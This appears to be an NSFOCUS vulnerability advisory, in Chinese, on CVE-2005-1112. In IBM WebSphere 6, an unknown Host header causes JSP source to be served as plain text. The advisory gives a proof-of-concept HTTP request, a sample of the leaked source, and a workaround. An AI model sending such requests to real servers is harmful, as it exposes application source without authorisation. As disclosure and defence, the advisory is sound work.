首页 -> 安全研究

安全研究

安全漏洞
IBM WebSphere配置JSP泄漏漏洞

发布日期:2005-04-14
更新日期:2005-04-14

受影响系统:
IBM Websphere Application Server 6
描述:
CVE(CAN) ID: CVE-2005-1112

IBM Websphere应用服务器以基于Java和Servlet引擎为基础,支持多种HTTP服务,可帮助用户完成从开发、发布到维护交互式的动态网站的所有工作。

在Web server的文档主目录中共享App Server文档主目录的方法存在漏洞,可能导致Web Server以明文存储JSP源码。

插件中有一组用于判断app server是否应处理特定请求的规则。如果流入的请求无法匹配这些规则,则插件就会向web server返回控制以便由web server实现这些请求。在这种情况下,未知的主机首部会导致插件向web server返回控制,因为规则没有指示由app server处理。因此,web server会在web server文档主目录中寻找请求。由于jsp源码存储在web server的文档主目录中,因此web server可以找到文件并以明文存储。

<*来源:SPI Labs (spilabs@spidynamics.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111342594129109&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

HTTP request sent
-----------------

GET /index.jsp  HTTP/1.0
Host: NonExistentHost


HTTP response received
----------------------

HTTP/1.1 200 OK
Via: HTTP/1.1 websphereserver (IBM-PROXY)
Date: Wed, 09 Mar 2005 21:39:43 GMT
Server: IBM_HTTP_Server/1.3.12.6 Apache/1.3.12 (Unix)
Last-Modified: Tue, 01 Mar 2005 18:35:02 GMT
ETag: "515e0007-1d72-4224b5d6"
Accept-Ranges: bytes
Content-Length: 7538
Content-Type: text/plain

<%@ include file="/main/inc/alt-header-0.inc" %>
<%@ include file="includes/tabincv4.jsp" %>
<%@ include file="includes/tactic.jsp" %>
<%=headerjs%>
<jsp:include page="<%=tabhdrinc %>" flush="true"/>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 从Web Server文档主目录中删除App Aerver JSP源码。

厂商补丁:

IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ers.ibm.com/

浏览次数:2947
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障